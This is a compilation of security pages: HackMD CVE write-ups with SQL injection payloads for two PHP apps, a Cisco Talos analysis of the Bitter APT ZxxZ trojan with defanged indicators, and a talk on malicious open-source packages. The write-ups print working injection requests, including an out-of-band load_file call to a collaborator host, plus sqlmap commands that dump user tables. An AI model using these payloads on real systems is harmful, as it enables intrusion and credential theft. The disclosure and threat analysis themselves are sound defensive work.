An arbitrary file upload vulnerability in the Upload Photos module of Wedding Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

HackMD

*   

*   

*   *   Create new note
    *   Create a note from template
*   

*   *   Options
    *   Versions and GitHub Sync
    *   Transfer ownership
    *   Delete this note
    *   Template
    *   Save as template
    *   Insert from template
    *   Export
    *   Dropbox
    *   Google Drive
    *   Gist
    *   Import
    *   Dropbox
    *   Google Drive
    *   Gist
    *   Clipboard
    *   Download
    *   Markdown
    *   HTML
    *   Raw HTML
    *   ODF (Beta)
*   *   Sharing
    
    *   View mode
        
        *   Edit mode
        *   View mode
        *   Book mode
        *   Slide mode
        
    *   Note Permission
    *   Read
        
        *   Owners
        *   Signed-in users
        *   Everyone
        
    *   Write
        
        *   Owners
        *   Signed-in users
        *   Everyone
        
    *   More (Comment, Invitee)

CVE-2022-29655: Wedding Management System Unrestricted File Upload + Remote Code Execution

Wedding Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /Wedding-Management/package_detail.php.

CVE-2022-29656: Wedding Management System Unauthenticated Sql Injection

Complete Online Job Search System v1.0 was discovered to contain a SQL injection vulnerability via /eris/index.php?q=result&searchfor=advancesearch.

CVE-2022-29316

\--- tags: CVE --- # Complete Online Job Search System Sql Injection \* \`Description\` => sql injection at \`Advance Search\` \* \`Injection Point\` \`\`\`python= SEARCH=972676&COMPANY='%2b(select%20load\_file('%5c%5c%5c%5cjvinr1qkhm4gaenevj08hk95uw0poge457tzgq4f.burpcollaborator.net%5c%5crij'))%2b'&CATEGORY=&submit=Submit \`\`\` # Exploit \* Use \`Burp Suite\` capture request then save as \`job.txt\` \`\`\`python= POST /eris/index.php?q=result&searchfor=advancesearch HTTP/1.1 Host: 192.168.1.101 Origin: http://192.168.1.101 Cookie: PHPSESSID=1dhucklh9bmi4ks7v86dch2k2f Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.101/eris/index.php?q=advancesearch Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 46 SEARCH=972676&COMPANY='%2b(select%20load\_file('%5c%5c%5c%5cjvinr1qkhm4gaenevj08hk95uw0poge457tzgq4f.burpcollaborator.net%5c%5crij'))%2b'&CATEGORY=&submit=Submit \`\`\` \* Use \`Sqlmap\` exploit databases \`\`\`python= python3 sqlmap.py -r job.txt -current-db \`\`\` !\[\](https://i.imgur.com/iKybK4N.png) \`\`\`python= python3 sqlmap.py -r job.txt -D erisdb --tables \`\`\` !\[\](https://i.imgur.com/cmyrHUr.png) \`\`\`python= python3 sqlmap.py -r job.txt -columns -D erisdb -T tblusers -dump \`\`\` !\[\](https://i.imgur.com/GgrDCOM.png) # Vulnerable Code !\[\](https://i.imgur.com/8C9pNAQ.png) No filter input when inserting data to database https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

CVE-2022-29316: Complete Online Job Search System Sql Injection - HackMD

Simple Bus Ticket Booking System v1.0 was discovered to contain multiple SQL injection vulnerbilities via the username and password parameters at /assets/partials/_handleLogin.php.

CVE-2022-29317

\--- tags: CVE --- # Simple Bus Ticket Booking System SQL Injection \* \`Description\` => sql injection at login to admin \* \`Injection Point\` \`\`\`python= username=\*&password=000000&submit= \`\`\` # Exploit \* Use \`Burp Suite\` capture request then save as \`bus.txt\` \`\`\`python= POST /SimpleBusTicket-PHP/assets/partials/\_handleLogin.php HTTP/1.1 Host: 192.168.1.101 Content-Length: 34 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.101 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.101/SimpleBusTicket-PHP/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=3aqqbkop81gpl260kvpq42stgo Connection: close username=\*&password=000000&submit= \`\`\` \* Use \`Sqlmap\` exploit databases \`\`\`python= python3 sqlmap.py -r bus.txt --current-db \`\`\` !\[\](https://i.imgur.com/D7u0l5b.png) \`\`\`python= python3 sqlmap.py -r bus.txt -D sbtbsphp --tables \`\`\` !\[\](https://i.imgur.com/jel63Am.png) \`\`\`python= python3 sqlmap.py -r bus.txt -columns -D sbtbsphp -T users -dump \`\`\` !\[\](https://i.imgur.com/8V68ANF.png) # Vulnerable Code !\[\](https://i.imgur.com/cIRhPMW.png) \* No filter \`user\_id\` when inserting data to database https://codeastro.com/simple-bus-ticket-booking-system-in-php-with-source-code/

CVE-2022-29317: Simple Bus Ticket Booking System SQL Injection - HackMD

Cisco Talos has observed an ongoing malicious campaign since August 2021 from the Bitter APT group that appears to target users in Bangladesh, a change from the attackers' usual victims.As part of this, there's a new trojan based on Apost Talos is calling "ZxxZ," that, among other...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

  

*   Cisco Talos has observed an ongoing malicious campaign since August 2021 from the Bitter APT group that appears to target users in Bangladesh, a change from the attackers' usual victims.
*   As part of this, there's a new trojan based on Apost Talos is calling "ZxxZ," that, among other features, includes remote file execution capability.
*   Based on the similarities between the C2 server in this campaign with that of Bitter's previous campaign, we assess with moderate confidence that this campaign is operated by the Bitter APT group.

**Executive Summary**

Cisco Talos discovered an ongoing campaign operated by what we believe is the Bitter APT group since August 2021. This campaign is a typical example of the actor targeting South Asian government entities.

This campaign targets an elite unit of the Bangladesh's government with a themed lure document alleging to relate to the regular operational tasks in the victim's organization. The lure document is a spear-phishing email sent to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB). The emails contain either a malicious RTF document or a Microsoft Excel spreadsheet weaponized to exploit known vulnerabilities. Once the victim opens the maldoc, the Equation Editor application is automatically launched to run the embedded objects containing the shellcode to exploit known vulnerabilities described by CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802 — all in Microsoft Office — then downloads the trojan from the hosting server and runs it on the victim's machine. The trojan masquerades as a Windows Security update service and allows the malicious actor to perform remote code execution, opening the door to other activities by installing other tools. In this campaign, the trojan runs itself but the actor has other RATs and downloaders in their arsenal.

Such surveillance campaigns could allow the threat actors to access the organization's confidential information and give their handlers an advantage over their competitors, regardless of whether they're state-sponsored.

**Bitter threat actor**

Bitter, also known as T-APT-17, is a suspected South Asian threat actor. They have been active since 2013, targeting energy, engineering and government sectors in China, Pakistan and Saudi Arabia. In their latest campaign, they have extended their targeting to Bangladeshi government entities.

Bitter is mainly motivated by espionage. The adversary typically downloads malware onto compromised endpoints from their hosting server via HTTP and uses DNS to establish contact with the command and control. Bitter is known for exploiting known vulnerabilities in victims' environments. For example, in 2021, security researchers discovered that the adversary was exploiting the zero-day vulnerability CVE-2021-28310, a security flaw in Microsoft's Desktop Manager. Bitter is known to target both mobile and desktop platforms. Their arsenal mainly contains Bitter RAT, Artra downloader, SlideRAT and AndroRAT.

**Infrastructure**

The actor's infrastructure consists of the C2 server (helpdesk\[.\]autodefragapp\[.\]com) and several domains that host the adversary's malware, which is outlined below.

 _Domains hosting Bitter APT malware._

The SSL thumbprints are unique for each domain's certificate. We compiled a list of these SSL thumbprints in the IOCs section of the report. The timeline below shows the various domains based on their certificate creation date.

The C2 host is helpdesk\[.\]autodefragapp\[.\]com. Its WhoIs record indicates that the domain autodefragapp\[.\]com registered it in November 2020, and later updated it on Nov. 3, 2021. We have seen the actor use this C2 in previous campaigns.

The C2 domain resolved to 99\[.\]83\[.\]154\[.\]118 during the period of the campaign. This is a legitimate IP address for the AWS Global Accelerator networking service. Usually, the AWS Global Accelerator provides static IPs to the registrant, which allows the user to redirect traffic to their application or host for improved performance. In this case, we believe that the actor is using the AWS Global Accelerator to redirect traffic to their actual C2 host, which is parked behind the legitimate AWS service. We believe that the actor has employed this technique to conceal their identity.

**Attribution**

We assess with moderate confidence that this campaign is operated by Bitter based on the use of the same C2 IP address from previous campaigns and similarities in the decrypted strings of the payload, such as module names, payload executable name, paths and the constants.

The 99\[.\]83\[.\]154\[.\]118 IP also hosts mswsceventlog\[.\]net, according to Cisco Umbrella, a domain that was previously reported as Bitter's C2 server in a campaign against Pakistani government organizations.

**The campaign**

Cisco Talos observed an ongoing campaign operated by the Bitter APT group since August 2021 targeting Bangladeshi government personnel with spear-phishing emails. The email contains a maldoc attachment and masquerades as a legitimate email. The sender asks the target to review or verify the attached maldoc, which is either a call data record (CDR), a list of phone numbers, or a list of registered cases. We have seen the actor use these themes in phishing emails in the past.

The maldocs are an RTF document and Microsoft Excel spreadsheets. Examples of the specific subjects of the phishing emails are below.

*   Subject: CDR
*   Subject: Application for CDR
*   Subject: List of Numbers to be verified
*   Subject: List of registered cases

The maldocs' file names are consistent with the phishing emails' themes, as seen in the list of file names below:

*   Passport Fee Dues.xlsx
*   List of Numbers to be verified.xlsx
*   ASP AVIJIT DAS.doc
*   Addl SP Hafizur Rahman.doc
*   Addl SP Hafizur Rahman.xlsx
*   Registered Cases List.xlsx

Below are two spear-phishing email samples of this campaign.

  
_Phishing email sample 1_

  
_Phishing email sample 2_

The actor is using JavaMail with the Zimbra web client version 8.8.15\_GA\_4101 to send the emails. Zimbra is a collaborative software suite that includes an email server and a web client for messaging.

  
_Phishing email header information._

The originating IP address and header information indicates the emails were sent from mail servers based in Pakistan and the actor spoofed the sender details to make the email appear as though it was sent from Pakistani government organizations. The actor exploited a possible vulnerability in the Zimbra mail server. By modifying the Zimbra mail server configuration file, a user can send emails from a non-existing email account/domain. We have compiled a list of fake sender email addresses from this campaign:

*   cdrrab13bd@gmail\[.\]com
*   arc@desto\[.\]gov\[.\]pk
*   so.dc@pc\[.\]gov\[.\]pk
*   mem\_psd@pc\[.\]gov\[.\]pk
*   chief\_pia@pc\[.\]gov\[.\]pk
*   rab3tikatuly@gmail\[.\]com
*   ddscm2@pof\[.\]gov\[.\]pk

**The infection chain**

The infection chain begins with the spear-phishing email and either a malicious RTF document or an Excel spreadsheet attachment. When the victim opens the attachment, it launches the Microsoft Equation Editor application to execute the equations in the form of OLE objects and connects to the hosting server to download and run the payload.

 _Malicious RTF infection chain summary._

In the case of a malicious Excel spreadsheet, when the victim opens the file, it launches the Microsoft Equation Editor application to execute the embedded equation object and launches the task scheduler to configure two scheduled tasks. One of the scheduled tasks downloads the trojan "ZxxZ" into the public user's account space, while the other task runs the "ZxxZ".

 _Malicious Excel infection chain summary._

The payload runs as a Windows security update service on the victim's machine and establishes communication with the C2 to remotely download and execute files in the victim's environment.

**RTF document**

The Malicious RTF document is weaponized to exploit the stack overflow vulnerability CVE-2017-11882, which enables arbitrary code execution on victims' machines running vulnerable versions of Microsoft Office. Our previous blog outlines how this particular exploit works in the victim's environment.

 _Malicious RTF document sample._

The RTF document is embedded with an OLE object with the class name "Equation 3.0." It contains the shellcode as an equation formula created using Microsoft Equation Editor.

 _Embedded Microsoft Equation object._

When the victim opens the RTF file with Microsoft Word, it invokes the Equation Editor application and executes the equation formula containing the Return-Oriented Programming (ROP) gadgets. The ROP loads and executes the shell code located at the end of the maldocs in an encrypted format that connects to the malicious host olmajhnservice\[.\]com and downloads the payload from the URL hxxp\[:\]//olmajhnservice\[.\]/nxl/nx. The payload is downloaded in the folder "C:\\$Utf" created by the shellcode and runs as a process on the victim's machine.

 _Download URL captured during runtime of the maldoc._

**Excel spreadsheet**

The malicious Excel spreadsheet is weaponized to exploit the Microsoft Office memory corruption vulnerabilities CVE-2018-0798 and CVE-2018-0802.

When the victim opens the Excel spreadsheet, it launches the Microsoft Equation Editor application to execute the embedded Microsoft Equation 3.0 objects.

 _Malicious Excel spreadsheet._

Once the Microsoft Equation Editor service executes the embedded objects, it invokes the scheduled task service to configure the task scheduler with the commands shown below:

Task 1: Rdx

Task 2: RdxFac

The actor creates the folder "RdxFact '' in the Windows tasks folder and schedules two tasks with the task names "Rdx '' and "RdxFac '' to run every five minutes. When the first task runs, the victim's machine attempts to connect to the hosting server through the URL and, using the cURL utility, downloads the "RdxFactory.exe" into the public user profile's music folder. RdxFactory.exe is the trojan downloader.

After five minutes of execution of the first task, "Rdx,", the second task, "RdxFac,"runs to start the payload.

Based on other related samples we discovered, the actor also uses different folder names, tasks names and dropper file names in their campaigns.

We noticed that the actor is using the cURL command-line utility to download the payload in the Windows environment. Systems running Windows 10 and later have the cURL utility, which the actor abuses in this campaign.

**The payload**

The payload is a 32-bit Windows executable compiled in Visual C++ with a timestamp of Sept. 10, 2021. We named the trojan "ZxxZ" based on the name of a separator that the payload uses while sending information to the C2. This trojan is a downloader that downloads and executes the remote file. The executables were seen with the filenames "Update.exe", "ntfsc.exe" or "nx" in this campaign. They are either downloaded or dropped into the victim's "local application data" folder and run as a Windows Security update with medium integrity to elevate the privileges of a standard user.

The actor uses common encoding techniques to obfuscate strings in the WinMain function to hide its behavior from static analysis tools.

 _WinMain function snippet._

The decryption function receives the encrypted strings and decrypts each character with the XOR operation and stores the result in an array that will be returned to the caller function.

 _Decryption function._

The malware searches for the Windows Defender and Kaspersky antivirus processes in the victim's machine by creating the snapshot of running processes using CreateToolhelp32Snapshot and iterates through each process using API Process32First and Process32Next.

  
_WinMain() snippet showing antivirus process detection._

The information-gathering function gathers the victim's hostname, operating system product name, and the victim's username and writes them into a memory buffer.

  
_Information-gathering function._

The C2 communicating function at offset 401C50 is called from the two other requests making functions to send the victim's information with the decrypted strings "xnb/dxagt5avbb2.php?txt=" and "data1.php?id=" to C2 and receive the response.

The received response is a remote file saved into the "debug" folder and executed with the API "ShellExecuteA". In our research debugging environment, the remote file is similar to the trojan.

 _Requests making function 1 at offset 00401E00._

 _Requests making function 2 at offset 00402130._

**C2 communication**

For C2 communication, first, the trojan sends the victim's computer name, user name, a separator "ZxxZ" and the Windows version pulled from the registry. The server responds back with data in the format <id><user>:"<Program name">.

Next, the malware requests the program data. The server sends back the data of the Portable Executable effectively matching the pattern:<zero or more bytes>ZxxZ<PE data minus the MZ>. It then saves the file to %LOCALAPPDATA%\\Debug\\<program name>.exe and tries to execute it.

 _Request sent to C2._

If the download is successful, the server sends back the request with the opcode DN-S and, in case of a failure, the opcode RN\_E in their response. Based on our analysis, the opdoce DN-S means "download successful" and RN\_E stands for run error. If failed, the malware attempts to download the program data 225 times, and after that, it will launch itself and exit.

**Conclusion**

Organizations should be vigilant about the highly motivated threat actors who are known to conduct targeted attacks in their region. Threat actors usually emerge with smart techniques to accomplish their adversarial objectives and we have seen such an attempt in this campaign with the addition of a new variant to their arsenal.

In this current campaign, upon compromising the victim's machine and implanting the trojan ZxxZ - which has remote file execution capability - the adversary can deploy and run other tools from their arsenal to achieve their malicious objective.

Organizations should have a layered defense strategy with the implementation of the latest detection rules and behavioral protections in their endpoint defense solutions - not only with technical controls, but the organizations should have matured incident response plans and have the organization's security posture streamlined to protect their environment against the latest threats.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

  
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

The following ClamAV signatures have been released to detect this threat:

Ole2.Exploit.ZxxZDownloader-9944376-0  
Win.Downloader.ZxxZ-9944378-0

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  
Snort SIDs for this threat are 59736 and 300132.

**IOC****Domains**

olmajhnservice\[.\]com  
levarisnetqlsvc\[.\]net  
urocakpmpanel\[.\]com  
tomcruefrshsvc\[.\]com  
autodefragapp\[.\]com  
helpdesk\[.\]autodefragapp\[.\]com

**URLs**

http\[://\]autodefragapp\[.\]com/  
hxxp\[://\]olmajhnservice\[.\]com/updateReqServ10893x\[.\]php?x=035347  
hxxp\[://\]olmajhnservice\[.\]com/  
hxxps\[://\]olmajhnservice\[.\]com/nt\[.\]php/?dt=%25computername%25-BKP&ct=BKP  
hxxp\[://\]olmajhnservice\[.\]com/nxl/nx  
hxxp\[://\]olmajhnservice\[.\]com/nxl/nx/  
hxxp\[://\]olmajhnservice\[.\]com/nt\[.\]php/?dt=  
hxxps\[://\]olmajhnservice\[.\]com/nt\[.\]php/?dt=%25computername%25-EX-2&ct=2  
hxxps\[://\]olmajhnservice\[.\]com/  
hxxps\[://\]olmajhnservice\[.\]com/nt\[.\]php/?dt=%25computername%25-EX-1  
hxxps\[://\]olmajhnservice\[.\]com/nt\[.\]php/?dt=%25computername%25-EX-1&amp  
hxxp\[://\]olmajhnservice\[.\]com/nt\[.\]php?dt=%25computername%25-ex-1&amp  
hxxp\[://\]olmajhnservice\[.\]com/nt\[.\]php  
hxxp\[://\]olmajhnservice\[.\]com/nt\[.\]php/  
hxxp\[://\]olmajhnservice\[.\]com/nt\[.\]php/?dt=%25username%25-EX-3ct=1  
hxxps\[://\]olmajhnservice\[.\]com/nt\[.\]php/?dt=%25computername%25-EX-1&ct=1  
hxxps\[://\]olmajhnservice\[.\]com/nt\[.\]php/?dt=%25computername%25-EX-1&amp;ct=1  
hxxps\[://\]olmajhnservice\[.\]com/nt\[.\]php/  
hxxps\[://\]olmajhnservice\[.\]com/nt\[.\]php/?dt=%25computername%25-EX-3&ct=3  
hxxps\[://\]olmajhnservice\[.\]com/nt\[.\]php/?dt=%25username%25-EX-3&ct=1  
hxxps\[://\]olmajhnservice\[.\]com/nt\[.\]php/?dt=%25username%25-EX-3&amp;ct=1  
hxxp\[://\]levarisnetqlsvc\[.\]net/drw/drw  
hxxp\[://\]levarisnetqlsvc\[.\]net/lt\[.\]php  
hxxp\[://\]levarisnetqlsvc\[.\]net/  
hxxps\[://\]levarisnetqlsvc\[.\]net/lt\[.\]php  
hxxp\[://\]levarisnetqlsvc\[.\]net/jig/gij  
hxxps\[://\]levarisnetqlsvc\[.\]net/lt\[.\]php/?dt=%25computername%25-LT-2&ct=LT  
hxxp\[://\]urocakpmpanel\[.\]com/axl/ax  
hxxp\[://\]urocakpmpanel\[.\]com/nt\[.\]php?dt=%25computername%25-\*\*\*\*  
hxxps\[://\]urocakpmpanel\[.\]com/  
hxxp\[://\]urocakpmpanel\[.\]com/nt\[.\]php/?dt=%25computername%25-\*\*\*\*  
hxxps\[://\]urocakpmpanel\[.\]com/nt\[.\]php/?dt=%25computername  
hxxp\[://\]urocakpmpanel\[.\]com/  
hxxp\[://\]urocakpmpanel\[.\]com:33324/  
hxxps\[://\]urocakpmpanel\[.\]com/nt\[.\]php

**SSL Certificates Thumbprints**

0cbf8c7ff9faf01a9b5c3874e9a9d49cbbf5037b  
25092b60d972e574ed593a468564de2394fa008b  
4fbde39a0735d1ad757038072cf541dfdc65faa3  
5a972665b590cc77dcdfb4500c04acda5dc1cc4e  
530f597666afc147886f5ad651b5071d0cc894ba  
04a75df9b60290efb1a2d934570ad203a23f4e9c  
aeb02ac0c0f0793651f32a3c0f594ce79ba99e82

**Documents**

b0b687977eee41ee7c3ed0d9d179e8c00181f0c0db64eebc0005a5c6325e8a82  
f7ed5eec6d1869498f2fca8f989125326b2d8cee8dcacf3bc9315ae7566963db  
490e9582b00e2622e56447f76de4c038ae0b658a022e6bc44f9eb0ddf0720de6  
b7765ff16309baacff3b19d1a1a5dd7850a1640392f64f19353e8a608b5a28c5  
ce922a20a73182c18101dae7e5acfc240deb43c1007709c20ea74c1dd35d2b12  
e4545764e0c54ed1e1321a038fa2c1921b5b70a591c95b24127f1b9de7212af8

**Payload**

fa0ed2faa3da831976fee90860ac39d50484b20bee692ce7f0ec35a15670fa92  
3fdf291e39e93305ebc9df19ba480ebd60845053b0b606a620bf482d0f09f4d3  
69b397400043ec7036e23c225d8d562fdcd3be887f0d076b93f6fcaae8f3dd61  
90fd32f8f7b494331ab1429712b1735c3d864c8c8a2461a5ab67b05023821787

Bitter APT adds Bangladesh to their targets

Hello everyone! This video was recorded for the VMconf 22 Vulnerability Management conference, vmconf.pw. I will be talking about malicious open source and the cost of using someone else’s code. Alternative video link (for Russia): https://vk.com/video-149273431_456239086Video in Russian from CISO Forum 2022: https://youtu.be/LPXg-MEamVA To be honest, at the beginning of the year I did not […]

Hello everyone! This video was recorded for the VMconf 22 Vulnerability Management conference, vmconf.pw. I will be talking about malicious open source and the cost of using someone else’s code.

Alternative video link (for Russia): https://vk.com/video-149273431\_456239086  
Video in Russian from CISO Forum 2022: https://youtu.be/LPXg-MEamVA

To be honest, at the beginning of the year I did not plan to talk about these things. But life changes rapidly and unpredictably, so it becomes impossible not to talk about this.

My name is Alexander Leonov. I have been working in the field of Vulnerability Management since 2009, I have a blog about it. I invite you to subscribe.

**The New Reality of Information Security (TNRoIS)**

We must start with the fact that this year is fundamentally different. We now live in The New Reality of Information Security (TNRoIS).

Western commercial IT/InfoSec vendors have proven to be completely unreliable. If you use their products, be prepared that in one day you can see the degradation of the product’s functionality up to complete uselessness, blocked updates and user support. All this without any refund.

It has become quite clear that Open Source tools and code can harm your organization, because project maintainers can easily inject malicious features into their projects. Now they are actually doing it! Hypothetical threats have become quite real!

In this video, let’s focus on Open Source issues.

**Open Source pros and cons**

Of course, Open Source is a good thing. It benefits the developers. They can access code they couldn’t write themselves. They can learn from the best in the industry. And they can even raise their status and even earn money if their Open Source projects are widely used.

Open Source benefits companies that receive tested code and solutions for free, save time and money, and can bring their own products to market faster.

But at the same time, it makes organizations dependent on Open Source. Open Source has become an integral part of the infrastructure and software development process. You have most likely heard these best practices:

*   Try not to write your own code, but use ready-made modules and libraries, because it is more efficient, faster and safer.
*   Update these ready-made modules and libraries as soon as possible to prevent exploitation of vulnerabilities.
*   Automatically rebuild and deploy projects by downloading dependencies from registries such as npm, PyPI, RubyGems, etc.

This leads to serious problems. One of the most interesting examples of this year is the malicious functionality in node-ipc.

**Malicious node-ipc**

Node.js (Node) is an open-source, cross-platform, back-end JavaScript runtime environment that runs on the V8 engine and executes JavaScript code outside a web browser. It allows the creation of Web servers and networking tools using JavaScript and a collection of “modules” that handle various core functionalities. Modules are provided for file system I/O, networking (DNS, HTTP, TCP, TLS/SSL, or UDP), binary data (buffers), cryptography functions, data streams, and other core functions. Modules can be installed with npm (Node Package Manager).

node-ipc is a nodejs module for local and remote Inter Process Communication with full support for Linux, Mac and Windows. node-ipc package has about a million downloads a week and is used as a dependency for 354 packages, including vue-cli.

On March 7, 2022, node-ipc maintainer Brandon Nozaki Miller (RIAEvangelist) embedded a package with malicious code into node-ipc. Malicious code has a 25% chance of replacing the contents of all files on systems (with write permissions) with the symbol “❤️”. It worked only on hosts with Russian and Belarusian IP addresses.

The code has been obfuscated. The parameters were stored in Base64. It’s not that hard to figure out manually what this code does, but it’s hard enough to detect such malicious functionality automatically.

Why did he do it? He explained this by some political position. But I don’t think it makes sense to talk about it. It can be political beliefs of any kind. Maybe there was a financial motivation. Maybe even he was intimidated by someone. It is important that a person had a certain power. People trusted him. And he took advantage of that trust to launch an attack.

File deletion was in versions 10.1.1, 10.1.2 (March 7). From March 8 to March 15, RIAEvangelist released versions 10.1.3, 11, 9.2.2 without file deletion, it just created a political proclamation file.

The last relatively safe version of node-ipc was 9.2.1. It hardly makes sense to continue to use RIAEvangelist’s releases of node-ipc, it is better to use the new fork.

It is not clear what to do with other projects where RIAEvangelist was a maintainer. He maintained 41 packages, some (js-queue, easy-stack, js-message, event-pubsub) have about a million downloads per week. It would be right to stop using them.

**Other cases**

It wouldn’t be so serious if it was a problem with one specific developer. However, unfortunately it is widespread. Some other cases:

▪ Encryptor in AWS Terraform modules (supported by the community). The malware was added by maintainer. Terraform is an open-source infrastructure as code software tool created by HashiCorp.  
▪ Malicious functionality in the Tasmota firmware for ESP8266 and ESP32 microcontrollers that can block the devices.  
▪ Destructive changes to the NPM packages colors and faker (used in 20 thousand projects), purposefully leading to failures at the build and execution stage.  
▪ Political proclamations in es5-ext, rete, PHP composer, PHPUnit, Redis Desktop Manager, Awesome Prometheus Alerts, verdaccio, filestash. Of course political proclamations are not so dangerous. On the other hand, it shows who exactly controls the project. These maintainers can do something far more critical if they want to.

**Registries**

In response to such malicious activity in Open Source projects, enthusiasts began to make registries that document all this. I will mention three of them.

*   ctorecords
*   toxic-repos.ru
*   GreatBookOfGrudges

**What should we do?**

To paraphrase the old meme that there are no clouds, there are someone else’s computers, there is no Open Source, there is someone else’s code. And those who control the code may have their own agenda.

But what about organizations using Open Source? What should they do?

The most obvious option and the least realistic: write code yourself, minimize dependencies, fork projects and maintain them yourself.

If we can’t just stop using someone else’s code, we’ll have to implement controls for Open Source:

*   Maintain Software bill of materials (SBOM) for products
*   Pay special attention to community projects. Large organizations tend to care more about their reputation and are less likely to engage in sabotage.
*   Check dependencies for functionality (Quality Assurance), vulnerabilities (Dynamic and Static Application Security Testing) and related incidents (Vulnerability Intelligence)

I also wanted to mention the good articles on the Snyk blog. Preventing malicious packages and supply chain attacks, 10 npm Security Best Practices. This company discovered and investigated the node-ipc case.

It also looks right to pay attention to specialized solutions against Supply Chain attacks, for example by Checkmarx. Slogan “Don’t take code from strangers​”. I’m not sure that it makes sense to purchase this particular solution, but it’s right to study its capabilities.

Well, I would like to finish with two ideas. First, that the current situation reminds me of the state of security in aviation. Those requirements for the screening of passengers that now exist are the result of real attacks, which unfortunately ended in disasters. So the introduction of controls for Open Source is also a painful process, but a necessary one.

As another metaphor, I would like to recall the poison detectors from Frank Herbert’s Dune universe.

> «The classic central chandelier remained unlighted, and its chain twisted upward into shadows where the mechanism of the poison-snooper had been concealed. Pausing in the doorway to inspect the arrangements, the Duke thought about the poison-snooper and what it signified in his society.
> 
> All of a pattern, he thought. You can plumb us by our language – the precise and delicate delineations for ways to administer treacherous death. Will someone try chaumurky tonight – poison in the drink? Or will it be chaumas – poison in the food?»

Indeed, the cases that we are seeing this year are some kind of poisoning attempts. We can discuss that this behavior is disgusting, that this is the behavior of cowards. But this will not stop such attacks. Protection from them becomes an urgent need. Those who do not do this are showing carelessness. So let’s set up our “poison-snoopers” and hope that this will save us from the most critical problems.

Hi! My name is Alexander and I am an Information Security Automation specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

Tag

#php